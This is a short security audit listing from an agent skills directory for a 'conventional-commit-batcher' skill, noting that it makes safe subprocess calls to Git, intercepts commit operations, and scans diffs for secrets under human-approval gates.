The Agent Skills Directory

[COMMAND_EXECUTION]: The skill executes local shell commands and Python scripts as part of its core functionality. Specifically, scripts/precommit_safety_gate.py and scripts/validate_conventional_commit.py use the subprocess module to interact with Git. These calls are implemented using secure practices (e.g., passing arguments as lists and avoiding shell=True) to prevent command injection.
[COMMAND_EXECUTION]: The skill defines mandatory interception for git add, git commit, and git push operations. It uses platform-specific mechanisms (like Kiro's preToolUse hooks) to ensure the agent follows the batching and safety-check workflow before executing these commands.
[SAFE]: The skill includes explicit instructions and code to detect and prevent the exposure of sensitive data. It scans Git diffs for patterns matching environment files, private keys, and hardcoded credentials, requiring explicit human confirmation if any are found.
[SAFE]: The 'auto-execute' behavior is mitigated by hard-coded safety gates that force a pause and require user approval for high-risk actions, such as committing to protected branches or including large binary files.

conventional-commit-batcher